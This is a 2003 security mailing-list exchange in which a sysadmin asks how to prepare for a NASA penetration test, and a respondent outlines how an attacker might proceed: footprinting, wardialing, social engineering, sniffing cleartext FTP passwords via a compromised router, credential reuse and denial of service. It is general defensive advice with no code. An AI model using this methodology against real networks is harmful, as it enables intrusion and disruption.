RE: NASA Security Audit

["Simons, Rick" <RSIMONS () alldata net>]

I am fairly green to the security field, but I will offer what I can.  I
will watch this thread with interest.  8)  If my reply is in no way related
to your actual question, please feel free to delete, heh.  I tend to answer
questions I know, even if the question I answered wasn't quite the question
posed.

If you have been in the field for 2 years, I doubt any of this will be
beneficial; but I will offer it anyway.  If I were trying to get in, I would
start by footprinting your organization.  IP range, phone number range,
browse the 'official' website for valuable info about your setup and a
personnel listing.  Then I would look at the doors in (ftp, term, x phone
numbers with modems on them (from the phone number scan), y contacts at the
location to social engineer with (from the website), google the personnel I
could find on the website to see, like in this case, if I could find a very
descriptive list of what hardware the target was running or perhaps some
personal pages created by employees that might help my attacks.  If one of
the posts was, like this one being very descriptive about the firewalling
solutions, I would start banging on the known vulnerabilities for those
devices.  You would be surprised how many attacks start out by reading news
groups or mailing lists and someone posts saying the security guru just left
and they were handed the job, have little experience in the field, etc. so
hackers who monitor said newsgroups and mailing lists open up the flood
gates.

With FTP obviously you have a clear text password issue, so I would start
moving out from your server and try to take control of a periphral router or
gateway so I could sniff user/pass for the service.  Chances are, perhaps
this isn't the case, but chances are that the ftp user/pass combos work for
the term service as well.

That is all I can think of, with possible ftp server vulnerabilities, term
service vulns, misc services that may be running, a known hardware device
list and associated old (possibly not patched) vulns, social engineering and
wardialing I'd say those will be hit first.  If those can garner no entry,
more head first tactics would be used.  Try to dos the hardware devices with
malformed packets or dos the services to prevent valid users from
connecting.  There is more than one way to skin a cat, and if I can't get in
- I would make sure nobody else could either.  Those types of attacks will
most likely NOT be employed by your penetration tester, as they are more
last resort tactics, but something to always keep in mind and adjust
rules/timeout values/etc. appropriately.  Unfortunately, at this point this
is where my knowledge/experience fails me, so I will leave this to the more
experienced people on this list to reply. 


Rick.

-----Original Message-----
From: Gregory M. Brown [mailto:gbrown () alvalearning com]
Sent: Wednesday, October 08, 2003 12:49 PM
To: SECURITY-BASICS () SECURITYFOCUS COM
Subject: NASA Security Audit


Well it looks as though I am finally going to be tested by the Feds.
According to my CTO, a guy named Jay Diceman will be the point man.
Anyone ever hear of him?  I hear he is a well known security expert
(ex-hacker?)for the federal government.  I have downloaded the Evaluated
Security Configuration document created for Microsoft by Science
Applications International Corporation.  There are actually 2 of these.
I think those .pdf's cover the Microsoft component.  I don't even want
him to get as far as any MS box.  I am fairly new to security (2years)
and my final exam is going to be a "Black Box" test and a "Crystal" test
from some heinously gifted hacker from NASA...

1.  What exactly will these 2 forms of intrusion concentrate on?

2.  Is my hardware up to the task?  I currently have a Fortigate
Fortinet 50 configured for intrusion detection and prevention.  I am
currently blocking 1300+ known attacks.  My FW is a CheckPoint Celestix
with a physical DMZ path.  The only questionable services allowed
through are FTP (requirement) and Terminal Services (requirement).

3.  What can I expect?  Any input is GREATLY appreciated.

Thanks.  Man I hope I still have a job in 2 weeks!
gb






 


---------------------------------------------------------------------------
----------------------------------------------------------------------------


---------------------------------------------------------------------------
----------------------------------------------------------------------------